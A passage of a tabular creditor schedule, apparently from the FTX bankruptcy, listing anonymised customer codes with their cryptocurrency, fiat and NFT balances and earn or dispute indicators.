| 07354844 | | USD[10.00] | | |
| 07354845 | | USD[10.00] | | |
| 07354846 | | USD[10.00] | | |
| 07354847 | | USD[0.01], USDT[2.14358020] | | |
| 07354848 | | CUSDT[1], DOGE[2], USD[0.00] | Yes | |
| 07354849 | | USD[10.00] | | |
| 07354850 | | USD[10.00] | | |
| 07354851 | | DOGE[26.29719786], USD[0.00] | | |
| 07354852 | | USD[10.00] | | |
| 07354853 | | USD[10.00] | | |
| 07354854 | | DOGE[157.57096281], USD[0.00] | Yes | |
| 07354855 | | ETH[0], SHIB[2693.95566847], USD[401.78] | Yes | |
| 07354856 | | USD[10.00] | | |
| 07354857 | | USD[10.00] | | |
| 07354858 | | GRT[1], TRX[1], USD[0.02] | | |
| 07354859 | | USD[10.00] | | |
| 07354860 | | USD[10.00] | | |
| 07354861 | | BRZ[1], CUSDT[2], GRT[1.00498957], USD[0.01] | Yes | |
| 07354862 | | USD[10.00] | | |
| 07354863 | | USD[10.00] | | |
| 07354864 | | CUSDT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07354865 | | BRZ[2], CUSDT[2], DOGE[1], SUSHI[1], TRX[1], USD[0.01], USDT[1] | | |
| 07354866 | | BRZ[1], CUSDT[4], DOGE[4], SHIB[10586104.52500546], SOL[.09047939], TRX[7], USD[0.00], USDT[0] | | |
| 07354867 | | CUSDT[6], KSHIB[384.15609645], SHIB[415279.59372244], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07354868 | | DOGE[16616.66016439], USD[0.00] | Yes | |
| 07354869 | | USD[0.01] | Yes | |
| 07354870 | | BRZ[4], CUSDT[5], DOGE[1000.55319118], USD[0.00] | | |
| 07354872 | | DOGE[1908.06747021], SUSHI[12.45932533], USD[10.00] | | |
| 07354873 | | USD[10.00] | | |
| 07354874 | | USD[10.00] | | |
| 07354875 | | USD[10.00] | | |
| 07354877 | | USD[10.00] | | |
| 07354879 | | USD[10.00] | | |
| 07354880 | | BTC[0], SHIB[1], USD[0.00] | Yes | |
| 07354881 | | BRZ[1], CUSDT[2], DOGE[8.1810447], SUSHI[.13620047], USD[0.05] | Yes | |
| 07354882 | | USD[0.02] | Yes | |
| 07354883 | | CUSDT[2], DOGE[1.0000375], SUSHI[1.99810865], USD[10.03] | | |
| 07354884 | | BRZ[1], BTC[0], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07354885 | | USD[10.00] | | |
| 07354886 | | USD[10.00] | | |
| 07354887 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354889 | | CUSDT[6], USD[0.01] | | |
| 07354890 | | USD[10.00] | | |
| 07354891 | | USD[0.00] | | |
| 07354892 | | DOGE[5291.58484553], SOL[1.13991526], TRX[1], USD[0.18] | | |
| 07354895 | | USD[10.00] | | |
| 07354896 | | USD[0.01] | Yes | |
| 07354897 | | BRZ[0], BTC[0], ETH[0], GRT[0], NFT (30694861690123828/Coachella x FTX Weekend 1 #8427)[1], USD[0.00], USDT[0] | | |
| 07354898 | | USD[0.00] | | |
| 07354899 | | BCH[.01402394], USD[0.00] | | |
| 07354900 | | USD[10.00] | | |
| 07354901 | | BTC[0.01363293], CUSDT[12], DOGE[41.29656963], ETH[.01120486], ETHW[.01120486], GRT[24.69709189], MATIC[7.07851933], SHIB[253260.73192351], SOL[.46274535], SUSHI[1.85468331], TRX[1], USD[0.00], USDT[1] | | |
| 07354904 | | CUSDT[1], USD[0.00] | Yes | |
| 07354905 | | USD[10.00] | | |
| 07354906 | | USD[10.00] | | |
| 07354907 | | USD[10.00] | | |
| 07354908 | | USD[10.00] | | |
| 07354909 | | USD[10.00] | | |
| 07354910 | | BRZ[1], CUSDT[6], TRX[3], USD[0.77] | | |
| 07354911 | | CUSDT[4], USD[0.00] | Yes | |
| 07354912 | | USD[10.00] | | |
| 07354913 | | USD[10.00] | | |
| 07354914 | | USD[0.00] | | |
| 07354915 | | USD[10.00] | | |
| 07354916 | | BRZ[0], CUSDT[3], GRT[0.00000002], TRX[0], USD[0.00] | | |
| 07354917 | | BAT[0], BRZ[0], BTC[0], DOGE[1], GRT[0], TRX[0], USD[0.00] | | |
| 07354918 | | CUSDT[5], TRX[1], USD[0.00] | | |
| 07354919 | | USD[0.01] | Yes | |
| 07354920 | | BTC[0.00000001], DOGE[1], SHIB[1], USD[0.01] | Yes | |
| 07354921 | | USD[17.97] | | |
| 07354922 | | DOGE[32.16076988], USD[0.00] | | |
| 07354923 | | BRZ[2], DOGE[767.01964088], TRX[2], USD[0.06] | | |
| 07354924 | | DOGE[4], TRX[1], USD[0.00] | | |
| 07354925 | | USD[10.00] | | |
| 07354926 | | USD[0.01] | | |
| 07354927 | | USD[0.00], USDT[0] | | |
| 07354928 | | USD[10.00] | | |
| 07354929 | | USD[10.00] | | |
| 07354930 | | DOGE[1], TRX[885.30326791], USD[0.00] | | |
| 07354931 | | CUSDT[1], USD[0.14] | | |
| 07354933 | | BRZ[1], CUSDT[1], DOGE[.05172812], TRX[1], USD[421.57] | Yes | |
| 07354934 | | USD[10.00] | | |
| 07354935 | | BTC[.00020995], CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07354936 | | USD[10.00] | | |
| 07354938 | | DOGE[363.36917483], TRX[1], USD[0.00] | | |
| 07354939 | | BTC[0], CUSDT[1], DOGE[4], TRX[2], USD[0.00] | | |
| 07354940 | | USD[0.00] | | |
| 07354941 | | USD[10.00] | | |
| 07354942 | | USD[10.00] | | |
| 07354943 | | TRX[228.7882722], USD[0.00] | Yes | |
| 07354944 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07354945 | | USD[10.00] | | |
| 07354947 | | USD[10.00] | | |
| 07354948 | | USD[10.00] | | |
| 07354949 | | USD[10.00] | | |
| 07354950 | | SHIB[583742.21807350], USD[0.00] | Yes | |
| 07354951 | | BAT[279.62422215], CUSDT[2], DOGE[4749.46324651], ETH[.24173707], ETHW[.24153817], GRT[205.48177677], SOL[26.52645453], TRX[2], USD[0.00] | Yes | |
| 07354952 | | BRZ[1], DOGE[2197.98394983], ETH[0.00000428], ETHW[0.00000428], SHIB[17], SOL[1.06198317], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07354953 | | BRZ[1], BTC[0], CUSDT[14], DOGE[2], ETH[0], ETHW[0], GRT[0], KSHIB[0], MATIC[0], SHIB[3], TRX[1], USD[0.00], USDT[0.00028654] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354954 | | USD[10.60] | | |
| 07354956 | | BRZ[2], CUSDT[3], DOGE[1465.59860339], SHIB[1392575.54550177], USD[0.00] | | |
| 07354957 | | USD[10.00] | | |
| 07354958 | | USD[10.00] | | |
| 07354960 | | USD[0.00] | | |
| 07354961 | | USD[10.00] | | |
| 07354962 | | ALGO[0], BAT[0], BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0], ETH[0.00000001], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], NFT (497521117434530162/Entrance Voucher #29703)[1], SHIB[2], SOL[0.00000142], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07354963 | | CUSDT[2], DOGE[50.97497802], TRX[4], USD[0.00] | | |
| 07354964 | | USD[10.00] | | |
| 07354965 | | BTC[0], CUSDT[0], SHIB[772570.85744422], USD[0.00] | Yes | |
| 07354966 | | BCH[.3984], DOGE[6993.516], ETH[.60258], ETHW[.60258], LINK[3.984], SOL[9.96], USD[475.93] | | |
| 07354967 | | USD[10.00] | | |
| 07354968 | | USD[10.00] | | |
| 07354969 | | USD[10.00] | | |
| 07354970 | | CUSDT[16], DOGE[242.46596453], TRX[2], USD[0.00] | | |
| 07354971 | | CUSDT[2], TRX[.000001], USD[0.00] | | |
| 07354972 | | USD[10.00] | | |
| 07354974 | | DOGE[.77604803], USD[0.00] | | |
| 07354976 | | USD[10.00] | | |
| 07354977 | | BTC[.00000009], USD[0.00] | | |
| 07354978 | | USD[10.00] | | |
| 07354979 | | BAT[17.02547775], USD[0.00] | | |
| 07354980 | | USD[10.00] | | |
| 07354981 | | USD[10.00] | | |
| 07354982 | | USD[10.00] | | |
| 07354983 | | USD[10.00] | | |
| 07354984 | | USD[10.00] | | |
| 07354986 | | DOGE[1], USD[0.01] | | |
| 07354987 | | BRZ[0], BTC[0], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07354988 | | DOGE[929.38955748], USD[0.00] | | |
| 07354989 | | ETH[.02482347], ETHW[.02482347], USD[0.01] | | |
| 07354990 | | DOGE[237.35685294], USD[10.40] | | |
| 07354991 | | ETH[0], GRT[0], USD[0.71] | | |
| 07354992 | | BRZ[1], DOGE[321.25542483], USD[0.00] | | |
| 07354993 | | DOGE[387.40710403], USD[0.01] | | |
| 07354994 | | USD[10.00] | | |
| 07354995 | | BRZ[2], CUSDT[3], DOGE[0.89984142], USD[0.40] | | |
| 07354996 | | TRX[1], USD[0.01] | | |
| 07354997 | | USD[0.07], USDT[0] | | |
| 07354998 | | CUSDT[3], DOGE[675.57401769], ETH[.00000001], TRX[2], USD[0.00], USDT[0] | | |
| 07354999 | | USD[10.00] | | |
| 07355000 | | BRZ[1], CUSDT[6], DOGE[.11154512], TRX[.74572265], USD[0.00] | | |
| 07355001 | | USD[10.00] | | |
| 07355002 | | USD[10.00] | | |
| 07355003 | | USD[10.00] | | |
| 07355004 | | BRZ[1], DOGE[882.03375813], USD[10.00] | | |
| 07355005 | | USD[10.00] | | |
| 07355006 | | BAT[11.89142142], USD[0.00] | | |
| 07355007 | | USD[10.00] | | |
| 07355008 | | CUSDT[2], DOGE[804.62347915], TRX[3], USD[0.51] | | |
| 07355009 | | USD[10.00] | | |
| 07355010 | | LINK[2.86658262], USD[0.00] | Yes | |
| 07355011 | | BRZ[2], CUSDT[1], DOGE[6180.24613647], USD[0.00] | | |
| 07355013 | | USD[10.00] | | |
| 07355014 | | USD[0.01] | | |
| 07355015 | | BAT[11], BRZ[14], BTC[.00624116], CUSDT[23], DOGE[9962.76057657], ETH[1.26281599], ETHW[1.26281599], GRT[11], KSHIB[232.41656361], LINK[18.07263514], MATIC[717.04223976], SHIB[2098033.14232615], SOL[9.76654798], SUSHI[1], TRX[192.66991021], UNI[2], USD[3357.76], USDT[6] | | |
| 07355016 | | BRZ[1], BTC[0], CUSDT[1], ETH[0], SOL[0], USD[0.00] | Yes | |
| 07355017 | | CUSDT[2], DOGE[30.22339650], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355018 | | NFT (45566580367573477 4/Coachella x FTX Weekend 2 #15778)[1] | | |
| 07355019 | | DOGE[750.00004514], USD[0.06] | | |
| 07355020 | | USD[10.00] | | |
| 07355021 | | USD[10.00] | | |
| 07355022 | | BRZ[2], CUSDT[6], DOGE[2], GRT[1], SHIB[5489701.65698308], TRX[5], USD[0.00 | | |
| 07355023 | | USD[10.00] | | |
| 07355025 | | CUSDT[3], DOGE[.75943944], USD[0.03] | | |
| 07355027 | | USD[10.00] | | |
| 07355028 | | CUSDT[1], DOGE[1], GRT[1], TRX[2], USD[0.01] | | |
| 07355029 | | TRX[2], USD[0.01] | | |
| 07355030 | | BRZ[5.07952967], CUSDT[3385.67370879], DOGE[2], GRT[1.00498957], SHIB[7252213.93446269], TRX[10816.83209776], USD[0.34], USDT[0] | Yes | |
| 07355031 | | USD[0.01] | Yes | |
| 07355032 | | DOGE[54.36600028], USD[0.00] | | |
| 07355033 | | CUSDT[4], TRX[2], USD[0.00] | | |
| 07355034 | | BAT[0], BTC[0], CAD[0.00], DOGE[63.52835400], ETH[0.00], EUR[0.00], GRT[0], LTC[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07355035 | | USD[10.00] | | |
| 07355036 | | USD[0.00], USDT[0] | | |
| 07355037 | | DOGE[.00002604], USD[0.01] | | |
| 07355038 | | USD[10.00] | | |
| 07355039 | | BTC[.00023624], USD[0.00] | | |
| 07355040 | | CUSDT[1], DOGE[1], TRX[0], USD[0.00] | | |
| 07355041 | | BAT[2.18726739], BRZ[5], BTC[0.04402393], CAD[1.34], CUSDT[41.81811353], DOGE[1255.15840210], ETHW[.02900891], GRT[1], SHIB[11251709.73795516], SOL[6.67262640], SUSHI[2.01628219], TRX[4], USD[0.00], USDT[2.18282629] | Yes | |
| 07355042 | | BRZ[0], DOGE[0], KSHIB[1464.26634765], SHIB[1], SOL[0], USD[0.01] | Yes | |
| 07355043 | | CUSDT[5], DOGE[1062.93256438], ETH[.03795014], ETHW[.03795014], TRX[2], USD[0.00] | | |
| 07355044 | | USD[10.00] | | |
| 07355045 | | USD[10.00] | | |
| 07355046 | | USD[10.00] | | |
| 07355047 | | ETH[1.194605], ETHW[1.194605], TRX[1], USD[10.00] | | |
| 07355048 | | CUSDT[2304.64901589], DOGE[1], SOL[25.32339389], TRX[554.38098329], USD[71.84] | Yes | |
| 07355049 | | USD[7.94] | | |
| 07355050 | | CUSDT[1], TRX[277.90814396], USD[0.00] | | |
| 07355051 | | USD[10.00] | | |
| 07355052 | | USD[0.08], USDT[0] | | |
| 07355053 | | CUSDT[4], LTC[0.02568055], USD[0.00] | | |
| 07355054 | | BRZ[2], BTC[.00369125], CUSDT[476.88702437], ETH[.02718579], ETHW[.02718579], SUSHI[3.51828511], TRX[560.91088797], USD[707.78] | | |
| 07355055 | | DOGE[1323.20005627], USD[10.00] | | |
| 07355056 | | BRZ[1], CUSDT[1], DOGE[37.62571653], TRX[1], USD[0.00] | | |
| 07355057 | | DOGE[.62747037], USD[0.00] | | |
| 07355058 | | USD[10.00] | | |
| 07355060 | | BRZ[1], CUSDT[6], DOGE[152.80861666], TRX[1], USD[0.00] | | |
| 07355061 | | DOGE[1], USD[0.00] | Yes | |
| 07355062 | | BAT[1.01655549], CUSDT[3], DOGE[2], SHIB[1], TRX[1], USD[0.00], USDT[1.10304282] | Yes | |
| 07355063 | | BRZ[1], CUSDT[2], DOGE[42955.08074558], ETH[1.01329694], ETHW[1.01329694], LINK[15.32775221], LTC[3.00025241], TRX[2], USD[12.98], USDT[2] | | |
| 07355064 | | USD[10.00] | | |
| 07355065 | | BRZ[2], BTC[.00317707], CUSDT[4], USD[0.00] | | |
| 07355066 | | USD[10.00] | | |
| 07355067 | | BAT[2], BRZ[5], CUSDT[37], DOGE[1], TRX[1], USD[0.78], USDT[0] | | |
| 07355068 | | BTC[.00000011], CUSDT[2], DOGE[18.27763953], USD[0.00] | Yes | |
| 07355069 | | CUSDT[1], DOGE[520.66859053], USD[0.01] | | |
| 07355070 | | USD[10.00] | | |
| 07355071 | | USD[10.00] | | |
| 07355072 | | CUSDT[3], DOGE[1559.72271246], TRX[1403.60707511], USD[50.00] | | |
| 07355073 | | USD[11.10] | Yes | |
| 07355074 | | KSHIB[8.37908244], LTC[.27508076], USD[0.00] | | |
| 07355075 | | SHIB[6036.54892761], USD[8.31] | Yes | |
| 07355077 | | USD[10.00] | | |
| 07355078 | | BRZ[1], DOGE[6731.31666377], SHIB[169204.072966], USD[0.01] | Yes | |
| 07355079 | | BAT[1], BRZ[2], CUSDT[4], DOGE[2857.18711146], GRT[1], TRX[1], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355080 | | DOGE[65.25960815], USD[0.00] | | |
| 07355081 | | BTC[0], ETHW[.12400803], SOL[0], USD[0.00], USDT[0.00001413] | | |
| 07355082 | | BTC[.0002966], USD[0.00] | | |
| 07355083 | | USD[10.00] | | |
| 07355084 | | USD[10.00] | | |
| 07355085 | | DOGE[12845.35945244] | | |
| 07355086 | | BRZ[1], BTC[.00239913], CUSDT[8], DOGE[4562.0492092], ETH[.03129286], ETHW[.03090688], TRX[3], USD[1.09] | Yes | |
| 07355087 | | USD[10.00] | | |
| 07355088 | | USD[14.96] | | |
| 07355089 | | USD[10.00] | | |
| 07355090 | | ALGO[84.80550938], DOGE[3], NFT (527507590608207743/The Afterlife)[1], SHIB[51532460.16831395], USD[0.00] | | |
| 07355091 | | USD[10.00] | | |
| 07355092 | | BRZ[3], BTC[0], DOGE[3], ETHW[0], MATIC[100.09598255], SHIB[2], SOL[0.70341454], SUSHI[0], TRX[7], UNI[0], USD[0.00] | Yes | |
| 07355094 | | AAVE[.81242825], AUD[15.92], BCH[.02901976], BRZ[76.46313054], BTC[.00973098], CAD[0.10], CUSDT[1556.98101844], DAI[.03524112], DOGE[3.29314896], ETH[.00005747], ETHW[0.50192976], EUR[0.09], GBP[0.08], GRT[0], KSHIB[385.71523204], MKR[.01074901], NEAR[15.02218312], PAXG[.0592221], SGD[0.53], SHIB[.00074489], SUSHI[29.31953875], TRX[5988.08301531], UNI[8.70723983], USD[0.00], USDT[8.71428076], YFI[.00106908] | Yes | |
| 07355095 | | BTC[.03168172], DOGE[7720.51835], ETH[.6020322], ETHW[.6020322], SHIB[3500000], USD[337.69] | | |
| 07355096 | | USD[10.00] | | |
| 07355097 | | BAT[0], BTC[0], DOGE[1.00160417], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07355098 | | USD[10.00] | | |
| 07355099 | | USD[10.00] | | |
| 07355100 | | BRZ[1], CUSDT[1], TRX[2], USD[0.01] | | |
| 07355101 | | DOGE[2592.06832277], TRX[1], USD[10.00] | | |
| 07355102 | | BAT[1.01235869], CUSDT[13], DOGE[.00004788], TRX[1], USD[0.00] | Yes | |
| 07355103 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07355104 | | BTC[.01184142], CUSDT[2], DOGE[7035.84157317], ETH[.18356561], ETHW[.18356561], GRT[1], SOL[4.02459649], TRX[2170.04214572], USD[0.00] | | |
| 07355106 | | BTC[0], DOGE[0], ETH[0], USD[0.01], USDT[0] | Yes | |
| 07355108 | | USD[10.00] | | |
| 07355109 | | CUSDT[2], DOGE[.0469513], USD[9.74] | | |
| 07355110 | | AVAX[.84272302], BAT[1.01106657], BF_POINT[400], BRZ[4], CUSDT[9], DOGE[9.1549562], GRT[4.10080134], LINK[170.59124131], SHIB[2], SOL[22.36246288], SUSHI[.00000011], TRX[8.00006919], UNI[.00004662], USD[0.22], USDT[2.13500676] | Yes | |
| 07355112 | | ETH[1.4979014], ETHW[1.49732725], SHIB[1], SOL[42.28285478], USD[0.00], USDT[0] | Yes | |
| 07355113 | | SOL[1.15379062], TRX[1], USD[0.00] | Yes | |
| 07355114 | | DOGE[28.70952054], USD[0.00] | | |
| 07355115 | | BAT[2.10684248], BRZ[9.80322659], CUSDT[18], DOGE[3], GRT[505.69291589], MATIC[434.36110794], SHIB[60230601.86998173], SOL[45.94580762], SUSHI[95.72107412], TRX[5804.25413799], USD[0.00], USDT[3.27562386] | Yes | |
| 07355116 | | BCH[0], BTC[0], CUSDT[6], DOGE[78.86846521], LTC[0], TRX[286.68906173], USD[0.00] | | |
| 07355117 | | USD[10.00] | | |
| 07355118 | | USD[10.00] | | |
| 07355120 | | USD[10.00] | | |
| 07355121 | | USD[10.00] | | |
| 07355122 | | USD[10.00] | | |
| 07355123 | | USD[10.00] | | |
| 07355124 | | CUSDT[1], DOGE[218.22919648], USD[0.00] | | |
| 07355126 | | USD[11.07] | Yes | |
| 07355127 | | USD[10.00] | | |
| 07355128 | | USD[10.00] | | |
| 07355129 | | USD[10.00] | | |
| 07355130 | Contingent, Disputed | BRZ[4], BTC[0], CUSDT[14], DOGE[0], TRX[6], USD[0.01], USDT[1.59069696] | Yes | |
| 07355131 | | CUSDT[1], DOGE[418.83199127], USD[0.00] | Yes | |
| 07355132 | | DOGE[1], GRT[1], USD[0.00], USDT[1] | | |
| 07355134 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07355135 | | USD[10.00] | | |
| 07355136 | | CUSDT[3], DOGE[3], LINK[.0001532], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07355137 | | USD[11.08] | Yes | |
| 07355138 | | BRZ[0.00181758], BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], SOL[0], TRX[1], USD[0.00], YFI[0] | | |
| 07355139 | | USD[10.00] | | |
| 07355140 | | DOGE[.00058748], USD[0.00] | | |
| 07355141 | | USD[110.00] | | |
| 07355142 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07355143 | | CUSDT[6], TRX[2], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355144 | | USD[10.00] | | |
| 07355145 | | CUSDT[1], DOGE[26.33799101], USD[0.00] | | |
| 07355147 | | BTC[0], ETH[0], USD[44.35] | | |
| 07355148 | | BRZ[1], CUSDT[5], USD[0.00] | | |
| 07355149 | | USD[10.00] | | |
| 07355150 | | USD[10.00] | | |
| 07355151 | | DOGE[2546.73967659], TRX[1], USD[0.00] | | |
| 07355152 | | BRZ[1], CUSDT[1], DOGE[1.21300283], USD[0.00] | | |
| 07355153 | | USD[10.00] | | |
| 07355154 | | CUSDT[.00365536], DOGE[806.1769998], ETH[.00000007], ETHW[.00000007], SHIB[1195043.06460873], SUSHI[.00001997], USD[61.12] | Yes | |
| 07355155 | | USD[20.00] | | |
| 07355156 | | BTC[.00000001], SHIB[4544.37447171], USD[0.00], USDT[0] | Yes | |
| 07355157 | | CUSDT[1], DOGE[1906.77653783], USD[0.00] | | |
| 07355158 | | DOGE[328.22463035], TRX[1], USD[0.00] | | |
| 07355159 | | BRZ[1], USD[11.04], USDT[1.10425225] | Yes | |
| 07355160 | | USD[0.00], USDT[0] | | |
| 07355161 | | USD[11.08] | Yes | |
| 07355162 | | USD[10.00] | | |
| 07355163 | | DOGE[.00119629], USD[0.00] | Yes | |
| 07355164 | | USD[10.00] | | |
| 07355165 | | DOGE[1066.26734866], LTC[0], SHIB[26079817.66340007], USD[0.00] | Yes | |
| 07355167 | | USD[10.00] | | |
| 07355169 | | DOGE[1.03656337], ETH[.00000001], TRX[2], USD[0.01] | Yes | |
| 07355170 | | USD[10.00] | | |
| 07355171 | | BTC[.00020675], USD[0.00] | | |
| 07355172 | | BTC[.00615694], CUSDT[8], ETH[.0910727], ETHW[.09002327], TRX[3], USD[0.00] | Yes | |
| 07355173 | | USD[10.00] | | |
| 07355174 | | USD[10.00] | | |
| 07355175 | | USD[10.00] | | |
| 07355176 | | DOGE[0] | | |
| 07355177 | | USD[10.00] | | |
| 07355178 | | CUSDT[9], DOGE[1], SHIB[1], TRX[3], USD[0.00] | | |
| 07355180 | | USD[10.00] | | |
| 07355181 | | USD[10.00] | | |
| 07355183 | | USD[10.00] | | |
| 07355184 | | BAT[2.03856729], BRZ[2], CUSDT[5], DOGE[1.10643372], TRX[5], USD[0.01], USDT[1.08170488] | Yes | |
| 07355186 | | USD[10.00] | | |
| 07355187 | | USD[0.01] | | |
| 07355188 | | BTC[0], SOL[0], UNI[0], USD[0.00] | | |
| 07355189 | | TRX[1], USD[0.01], USDT[1] | | |
| 07355191 | | USD[10.00] | | |
| 07355192 | | USD[10.00] | | |
| 07355193 | | BRZ[1], DOGE[1321.25304163], SHIB[5], USD[0.00] | Yes | |
| 07355195 | | USD[10.00] | | |
| 07355197 | | USD[10.00] | | |
| 07355198 | | USD[0.00] | Yes | |
| 07355199 | | DOGE[51.30898191], USD[10.00] | | |
| 07355201 | | CUSDT[1], NFT [496234183113721084/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #59][1], USD[0.05], USDT[1.00172753] | | |
| 07355202 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07355204 | | KSHIB[5.08549812], SOL[2.01718959], USD[0.00], YFI[0] | Yes | |
| 07355205 | | USD[10.00] | | |
| 07355207 | | DOGE[1], USD[0.01] | | |
| 07355211 | | BTC[.000871], CUSDT[1], DOGE[1], ETH[.017917], ETHW[.017917], TRX[1], USD[0.00] | | |
| 07355212 | | USD[0.01] | | |
| 07355213 | | DOGE[1], USD[0.01] | | |
| 07355216 | | CUSDT[2], DOGE[3], TRX[1], USD[0.00], USDT[2] | | |
| 07355218 | | USD[10.00] | | |
| 07355219 | | BRZ[2], CAD[0.03], CUSDT[11], DOGE[4.34882194], GRT[.00079789], SOL[.05428959], TRX[4], UNI[.00017642], USD[0.74], USDT[0.00002000] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355220 | | USD[10.00] | | |
| 07355221 | | DOGE[4.65526484], USD[0.00] | | |
| 07355222 | | USD[10.00] | | |
| 07355223 | | USD[10.00] | | |
| 07355225 | | LTC[.04396282], USD[0.00] | | |
| 07355229 | | BTC[.00071107], ETH[.00005307], ETHW[.00005307], USD[0.00] | Yes | |
| 07355232 | | USD[10.00] | | |
| 07355233 | | BRZ[3], BTC[.00377452], CUSDT[7], DOGE[4930.75677917], ETH[.03934161], ETHW[.03934161], LTC[.11448854], SOL[.35471154], TRX[2], USD[10.00] | | |
| 07355234 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07355235 | | CUSDT[5], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07355236 | | USD[10.00] | | |
| 07355237 | | USD[10.00] | | |
| 07355238 | | USD[10.00] | | |
| 07355239 | | USD[10.00] | | |
| 07355241 | | USD[10.00] | | |
| 07355242 | | DOGE[1], USD[0.00] | | |
| 07355243 | | GRT[.27688372], USD[1.31] | | |
| 07355244 | | BTC[.00019628], DOGE[25.70318307], ETH[.00249053], ETHW[.00249053], USD[0.00] | | |
| 07355245 | | USD[10.00] | | |
| 07355246 | | USD[10.00] | | |
| 07355247 | | BAT[3.27644802], BCH[4.29543157], BRZ[1], BTC[.06392864], CUSDT[39], DOGE[86726.24547610], ETH[1.11523068], ETHW[.49085435], GRT[1.0041589], LTC[11.48283012], TRX[10706.08433374], USD[0.00], USDT[0.00000001], YFI[.00342884] | Yes | |
| 07355248 | | USD[10.00] | | |
| 07355249 | | BTC[.00232111], CUSDT[1], DOGE[2857.49635966], USD[0.00] | Yes | |
| 07355250 | | USD[10.00] | | |
| 07355251 | | USD[10.00] | | |
| 07355252 | | BRZ[1], CUSDT[2], USD[18.43] | | |
| 07355253 | | USD[10.00] | | |
| 07355254 | | DOGE[2], USD[39.49] | Yes | |
| 07355255 | | USD[10.00] | | |
| 07355256 | | USD[10.00] | | |
| 07355257 | | USD[10.00] | | |
| 07355258 | | TRX[.00560561], USD[0.00] | | |
| 07355259 | | USD[0.02] | | |
| 07355260 | | USD[10.00] | | |
| 07355262 | | BTC[0], DOGE[18.16931853], TRX[0], USD[2.87] | Yes | |
| 07355263 | | BAT[1.01655549], BRZ[2], CUSDT[1], SHIB[1], TRX[1], USD[968.25] | Yes | |
| 07355264 | | DOGE[427.8999631], TRX[1], USD[0.00] | | |
| 07355265 | | BTC[.00027518], DOGE[691.21069293], ETH[0.01293673], ETHW[0.01277257], USD[0.00] | Yes | |
| 07355267 | | USD[10.00] | | |
| 07355268 | | BRZ[1], CUSDT[24], LINK[.00483134], SOL[.00004301], TRX[1.00001484], USD[7.27], YFI[0] | Yes | |
| 07355269 | | BAT[1], DOGE[1.00006102], GRT[1], USD[0.00] | | |
| 07355270 | | USD[10.00] | | |
| 07355271 | | DOGE[1.44168396], USD[277.95] | | |
| 07355272 | | DOGE[8612.54409044], TRX[4215.94439717], USD[0.00] | | |
| 07355273 | | BTC[0], UNI[0], USD[0.01], USDT[0] | | |
| 07355275 | | USD[10.00] | | |
| 07355276 | | TRX[478.35420736], USD[0.00] | Yes | |
| 07355278 | | DOGE[258.33151424], UNI[.26963194], USD[0.00] | | |
| 07355279 | | BAT[0], GRT[11.28341699], USD[0.00], USDT[0] | Yes | |
| 07355282 | | USD[10.00] | | |
| 07355283 | | CUSDT[2], USD[0.00] | Yes | |
| 07355284 | | USD[10.00] | | |
| 07355285 | | TRX[1], USD[0.00] | | |
| 07355286 | | USD[10.00] | | |
| 07355287 | | USD[10.00] | | |
| 07355288 | | BAT[1.01655549], BCH[.00001791], BRZ[2.00001212], CUSDT[5], GRT[.00945588], LINK[.00077967], USD[0.01], USDT[.045061] | Yes | |
| 07355289 | | BAT[1.0165555], BRZ[1], BTC[.00001903], CUSDT[12], DOGE[.99479423], TRX[6], USD[33.78], USDT[0.00008096] | Yes | |
| 07355290 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355291 | | CUSDT[2], USD[0.00] | | |
| 07355292 | | DOGE[154.18723187], USD[0.00] | Yes | |
| 07355293 | | CUSDT[1], DOGE[2016.13803428], SHIB[3011295.78307592], TRX[1076.94280313], USD[0.00] | Yes | |
| 07355294 | | BTC[0], USD[0.00], USDT[0] | | |
| 07355295 | | BCH[.00902903], CUSDT[3], DOGE[151.38052718], ETH[.00283393], ETHW[.00283393], EUR[1.63], SOL[1.00933065], TRX[83.67874057], USD[-15.00] | | |
